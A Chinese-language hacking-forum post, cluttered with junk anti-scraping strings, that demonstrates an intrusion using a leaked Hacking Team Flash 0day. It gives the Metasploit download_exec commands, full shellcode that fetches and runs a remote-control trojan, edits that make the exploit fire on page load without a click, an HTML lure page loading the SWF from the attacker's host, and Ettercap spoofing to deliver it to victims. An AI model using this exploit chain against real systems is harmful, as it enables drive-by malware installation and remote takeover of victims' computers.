|
, r7 S, _! y% |' b& R- _2 u2 Q, w, T 三、flash 0day之手工代码修改制作下载者实例入侵演示
( u" N6 Y- b- M1 \# a& ~ 3 P% r7 V5 t( m. J6 s( ]) Q
$ i( w* }1 T. L2 G) K' m 利用到的工具:
. |- h% y/ L) Z1 V5 K , f9 U; R, N" k7 Q1 x
6 q( {4 V* C8 a7 Y1 M1 j
Msf % u" Y1 f) x/ l5 M& e
: y; [8 K/ B4 Z _1 y! d/ I D& P5 G. r J
Ettercap
" B4 M4 ?$ [; _9 }: q+ c9 N7 W
; H, T! y7 [4 Z% M3 b$ F! I8 u, A& x& {% ^( K! C
Adobe Flash CS6
n" @+ T" {3 O& ^2 {$ t/ s $ q P! Z' ~. @: H
* o$ `5 Q6 n4 k0 x- B! P
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 X% |0 J9 z% N, e
0 ?5 r: x4 `- W0 v4 t! S H a* |6 w5 p/ u/ f, H4 W, N( {; j
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options . c, R' n7 U& L8 H$ ?! x
1 v! v! L6 v3 G o% d
( i# j5 t/ ]$ q$ _6 }! `# g7 P! H& v 如图: ( @4 I# R, F$ y+ L; ]4 R8 n
. s2 ?( L; \( P- }! X4 I' X& V$ r0 U
# E! \; a2 A2 J6 J) V
. j, \' Y* I' f/ f! U0 S7 _0 Q z2 A" Z( G$ N
 / M1 O* y4 h6 `# C% A' Z
( _0 E- X5 D+ Y( |) x X
) \% I: }- a' m. Q5 G 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: % [6 x4 Y! {2 O0 G, J' c
+ h% t3 d5 z* b2 Y( }
+ e0 _+ d9 d m) N9 Z2 a 9 j z0 W) p' y* u- A
( k$ ]8 e% _" G, k
% a1 Q1 _; ?6 ~" s  - v. r: I$ W3 X N! P
, v0 {/ I/ A8 v4 f! _% K+ a7 l
: |+ u0 i$ Q5 p% v; {: j* g 然后执行generate -t dword生成shellcode,如下:
/ f4 B" @& l7 w$ k ) z2 b! R6 E/ G% j
! {7 F, M# ]( E0 r+ {  ' z4 ^" v4 {3 l6 }' t" |+ q4 s
7 i. M# F9 W. \# W
( [9 \9 A6 M# d7 }
复制代码到文本下便于我们一会编辑flash exp,如下:
+ S, B/ q3 m) ~ X+ _& M - z9 ?$ a1 t/ b3 M2 D, [9 B
5 |* a5 H2 v- E$ ^4 N2 F/ q0 w/ A 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
3 |0 ]1 F2 S: F; ~. s" O, a1 X
/ d/ w. y' |: `- H7 a
4 z# U) O/ z4 E$ o. n 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
: o' M2 \9 N# M3 f+ a& H
) H, t3 W% ?/ i$ y7 V4 P
9 ?1 o7 ]( K4 g% P( c* {: j/ j0 s 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
9 C0 M5 {! ^. b4 v% A 8 D, `" M. ^3 y6 s: X
8 H6 o0 R5 e# ` y2 @ D
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ' S& k$ {1 [" i- e
1 r7 K* R2 g5 v0 ]* s
0 Q4 I4 ^0 U2 s2 u' g 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
: d. H) c$ u# \1 Z! u- H ) v$ b$ E8 M% Z: Y' z+ Q
" ~/ f8 |- a# c! \7 Y/ K6 Z! V
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
" D$ e$ }: |4 d. d& w : N# B* B8 e- c& V
' B Y( E" ]3 o; ~5 `0 G+ }
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 8 P- O0 Z) q5 O' m$ B' r
4 g8 {4 W7 e6 j$ u, \- k4 R
8 H, s3 I& Y+ Q) f# g. Z5 p
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, + R' t0 q! Y" F* q, l" I' P6 j1 |. }
- H( }1 b' Y' ~! d, l+ y
, m7 y; Z$ Y2 J2 R2 y5 C0 Q 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, * r6 o3 ]8 `& ?1 f& @' c( L( T J
' b( c/ w) }8 p) r
3 o. K: Z1 a/ ?& p s9 o# T) M, @ 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' Z6 h( m: z/ t! K) ]+ u, V
. y( e* g8 o3 Q: c
0 Z l2 P+ n1 Q# W) w/ r* w- i
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
5 y2 f2 ~3 q- ?# U/ O2 ^; G3 `4 E 8 X# Q6 r5 D' S# ~# p y( D. i
6 t4 D9 h6 t0 P5 N' Y6 Y, ?; p; e
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 2 X, V' U* q1 A' u
6 K/ o; C& k" x) ], n; E& L
# _5 a: N4 O( q9 S+ q7 H( a 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, ! D6 _3 ?: m9 ~9 Z0 g2 H. _
/ ~$ f5 F3 q. _' F. G3 t5 x0 H2 G
. K, t5 K7 A1 p- R0 S
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
& P8 V" w5 L* R) [ 3 e; @. I1 d2 g/ `
; C6 s3 i2 f+ Q9 `; S8 i
4 _# x4 B* s' g8 c% `
: i1 |" ?; \3 y- q3 V+ d
+ R) W7 F- Q+ o1 X 8 _6 l# q8 @/ s( H' m- O
/ {' q+ A- t, y4 Y
# `3 }. h ?$ I& I9 r4 M 下面我们来修改flash 0day exp,需要修改三个文件,分别为: + n3 x1 o1 E4 J5 N% ^3 e U) Z
0 H& n1 b3 s" H7 C$ q
# t5 O! f5 f& m+ H/ p- F8 c2 n' q9 W" e
 , X/ e! j* j1 [* j' L9 e9 H
$ t5 S% w( k" d& e% ~8 t
5 Y6 C4 n+ U$ N
先修改ShellWin32.as,部分源代码如图: * N4 A% m# O8 o
5 G* V' X7 |/ P: r- _: w) r4 V2 f* h3 i: |
 6 Y8 m& t4 {7 B' r' ~
9 b4 v" D1 D1 L+ g/ ~
# V/ |: r: I: A" J' F/ O 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 b; w0 }7 t# ~, \( T
* i: R9 M/ M, Q, |$ o% `( s0 h8 }, k) X9 S, G: F0 b4 }+ Z" ]+ E; R5 r
7 O" B3 m$ x$ h2 l
" M2 H0 l7 z1 q% h! C, Q! m" n! S: y8 |# G
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: # O# X# \3 R; X3 n. V. H8 @
- x( N2 n$ h: d' c7 m& @7 n: j. N; k$ U$ P
, y% k5 v6 d. R
. k, h& ?5 `9 l: a: o3 x. D( i) _, h- _) r8 H+ b& ?8 x2 e
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
" L, T1 n) a- U: K2 Q 1 A7 R2 L. b l$ u4 f: |5 \! Y
* V& q, J! Y- G c. L# K! X, r
+ e# _6 J* i# p( N1 a+ t " f2 q9 {& I3 G& D: e5 @
7 R1 `/ h8 ~9 E. h
" X3 k4 k' Y' E6 H5 A : w! a2 a" l* Q h/ X# }$ d+ O3 G
: v) R. m5 X3 S) h- |9 ?( B
 ( i* w. l9 z5 R- Y0 V1 p' K' t
- c S# g& z8 b, [$ `' a. G) S) X* e' W# Q- u
然后点保存,下面我们来编译一下,打开
3 l' ?) S" H6 L1 G- H- t
$ |5 H. _. D4 @2 ?
" m' S0 _+ f% ]( C; f exp1.fla然后点文件-发布,看看编译没错误 ' F" M$ x: G Z! P* A. d2 X5 n" ^4 ]
8 ? I5 a) c/ x
% y; L- A4 D' E1 i" [
) J4 W: v4 r: ?: Z. l( i( L
) M2 o+ q- Y( `: A5 n
9 e' t# C! `0 g; N$ W6 l 3 t. y% E, U; ~- ]$ I, R
- f; H9 X2 Q; t1 M* O0 R; V6 Q$ ?1 _; x/ I( h& \ y) f4 o
* ?* B. Y1 F p* G) E. j
( `# n7 W3 R) K+ w) d
# `% T' g* A; e  ) Z4 m" ~/ L* h) A5 H M6 r
4 V+ G9 T: V; d/ Z. i, D( r
; o; g I. d$ I6 d' Q$ C& f( k, b
然后我们把生成的
& w: q$ C7 }3 b# \4 ?
" _. b3 {: `6 M! J6 y' k g' _. o3 Y$ w" V/ Y
exp1.swf丢到kailinux 的/var/www/html下:
' d# F& u, {9 i- [( \! x, D
: z5 I$ C' s7 i# Q* k7 D3 @* ^5 L$ E. r6 a1 I9 t
然后把这段代码好好编辑一下
7 V: z6 H9 ^& }8 |" s% N5 v
2 s5 n' \8 y; @, ?1 z+ [* y0 `+ |8 G
9 n- B5 R& p" V `3 G& N# q
* S; R' k) n8 u6 d6 h* k/ F( l
) d) x. E6 _' r1 y
) M0 H6 F) K: V2 o5 G7 }! k! e1 J ) l2 ]' j3 f. K
' l- o. i( C, _; m% Q - N1 F0 P. Y5 C; s. w
. e# Q3 ^, J- @' D+ Z$ W9 S: C. c# p
: _0 q; T8 q4 e1 l R8 p# Z
- R8 S& y! G$ C! \+ w
8 A$ F6 q9 G9 D3 H: q+ J$ B/ j2 n- }( @0 s1 o( n% Z: |/ @
# C/ W" f+ `5 b& l+ x# r" {- k 9 R# U2 f' |) t
& _3 K4 {2 w Q7 i3 y
) ~/ ~" c6 J9 R
% }& U$ z; P& y2 K: H6 g! Z2 L, t4 n
<!DOCTYPE html>
" Y' K* e u4 m8 j2 J- o
7 p9 E: d; X/ b" o; K. T
9 u* |# a( u% \- s/ J8 }$ U' V <html>
: E% t. V1 T% i6 M& D . K8 V# f& s# F1 ~- X' h
. m! `& r6 h' t+ }1 D5 F <head>
" S4 p, f- z& H' X2 r 4 o! a; `9 G) ^" k" L' r
- U [; S1 R! r4 G$ r7 V <meta http-equiv="Content-Type" content="text/html; 9 b7 }+ X& J- A" E8 H! J
# A1 [; Q% K3 N0 Q6 c% l! u
& }! |- L J; D$ H& g& m charset=utf-8"/>
0 z; P; F2 L7 k0 h4 c ( {5 a* C& t/ C& K& O7 E H0 L
2 ~" I( \( |2 A* E# Y- E
</head>
. @) L$ H% @; T8 [/ ^2 Q * ?9 |7 [) k; c; j7 g, V
7 M4 Z8 Q( g* O8 U
<body> 5 P8 n0 A* c1 M4 |7 I
* n; _, k* H1 A( f
* R2 J6 b, G+ N3 Z3 [
<h2> Please wait, the requested page is loading...</h2> ( |! O& D& e+ U: U" _! ?2 M, s4 P
% A/ _) G+ ?* s. {
& c. G8 i2 `: x0 ?/ W8 G7 A <br>
( ~ u4 O. n* a0 a& K6 E0 I 8 g6 U" V! b1 d% v1 ]
A$ D, _9 \, s, X! q
<OBJECT
* J% p- h& b$ |+ N
" S& R5 d0 S1 q1 k8 Q# l3 G! t, f/ ?2 j& g( K! x R
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
# \* b" O, I0 i, ^$ G+ O 6 d8 \; z* |5 H' t4 ?
' y/ V- w0 \" A: _% l! e8 t' N( k d VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
( G1 \; ]' S& t$ F3 _* [ 4 e, c0 u9 u, _6 w5 T/ W7 i
& G1 C4 C. ^1 V7 ]1 A </body> " X- z. J4 M. w1 _7 a# y/ j+ _
( |; @. r3 Y$ `& p9 v/ [5 Z6 v8 b) U v- K# O; M. x; M0 T. P
<script>
$ W; E* G9 r3 X! ]; m
/ P' A/ T! z7 M8 T
, Z5 e2 x0 {/ I4 y2 @ setTimeout(function () { + Z, W6 Z" t7 |6 [4 u
- _8 B- b3 H7 ?5 _$ \, C- x
4 O) |0 g5 X! Y. A1 @ 1 a# A8 l, A9 E( O1 p+ {; E
& w( ~3 t" {) i+ v
2 M, ]) |& G% q K( c window.location.reload(); : k+ ]) ^. J( }0 Q0 g( q4 b
$ P* k' P& p: X1 |- U
4 F7 O) W" r- a, o: ]/ ~ }, 10000);
( X; V5 R1 d- f9 T+ w
! C ~$ g8 ]- f, z2 ]* t9 Z4 r% L D1 Y/ }: B
4 x& G, o- |5 f; H# x
0 J" E' P6 n6 i
7 R2 ~8 q5 s& R/ J Z </script> + \9 j3 m$ v# q8 K! e
i6 d$ f- i7 B; j, S
" d6 S3 J5 X$ u: b) E6 H9 N </html>
( V& U e+ Y; h/ T' s4 ` ( X! Z( J! s; L
k4 i: _% @0 i. k9 r% {
! J& i# _; I! _% y2 K
; O5 U+ a, T% O3 c& A. Y5 p1 N1 e t( q5 t B. d5 w! i! q, O) g4 B
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
: Q( h) s! _/ B8 k1 D& ^, P
3 {5 P I5 i* H8 O& s
% W' d: r4 A$ i i/ s& B  9 \" O1 p/ M- a/ x
: A @, o' M" q- C% b2 O3 S( {$ U; N& _8 m" s0 b' u3 D
. D# P" f7 T5 y6 c/ f* B
- X; g: z$ K5 O" G% U% o& [
: c% d1 v/ l2 N% F5 V' a* U ( e+ @' o* x5 y9 D; A, t
; n' a1 ?2 J! A# f1 e
% q `& G1 }0 }4 c/ L m# K( d8 o* I
H) w' q( w' q6 h
6 ]; n6 j+ b$ S2 y$ Z$ O& H# u4 ]8 E, b
7 n' A' l4 b! z! J- D3 Y9 c/ a
5 y) @# F+ o; N2 a6 a$ Y! ^
4 s C. i _3 H3 _) V 下面我们用ettercap欺骗如图: 2 K0 P8 V$ I; h7 T% B) ]
/ N9 x1 _' c7 Y* v8 A# l% b; w7 Y9 ^0 P" n5 H
 ; `" P% t* @9 g
2 {4 D7 q- a- }0 [) [5 S! i6 z" d4 M/ ~+ [/ r; Z A$ w! i- d/ I
5 L1 U Z2 B9 @" }4 Q6 I
5 Q2 v; e$ e; H; S+ x5 `, S% f& J: [( f; L0 B4 V, _- a" S
下面我们随便访问个网站看看: $ \3 D) g! E5 x5 j% Q
8 w5 _( a8 N. z" q' w- p5 g6 `, b6 E2 i. d( C8 K* z
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 2 N0 y" }, ?- j" A# W/ t; Q2 p
3 B8 i( N( z. x) d0 q2 m% l! w5 n$ [3 N% R' D6 g( w- o
0 `$ v# S0 K3 E1 m* \' ^( |* I% E/ X ! @4 M& }2 D2 C, \8 S
: Z: j1 c/ |7 U j
我们看另一台,
4 [# X3 f2 U w 6 o+ V/ [8 `2 |8 K$ Z) ^% Y
* I7 D1 _3 _, W. s* [
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
4 H6 c9 A) F7 r9 K2 @ | 
发表于 2018-10-20 20:28:55
收藏
支持
反对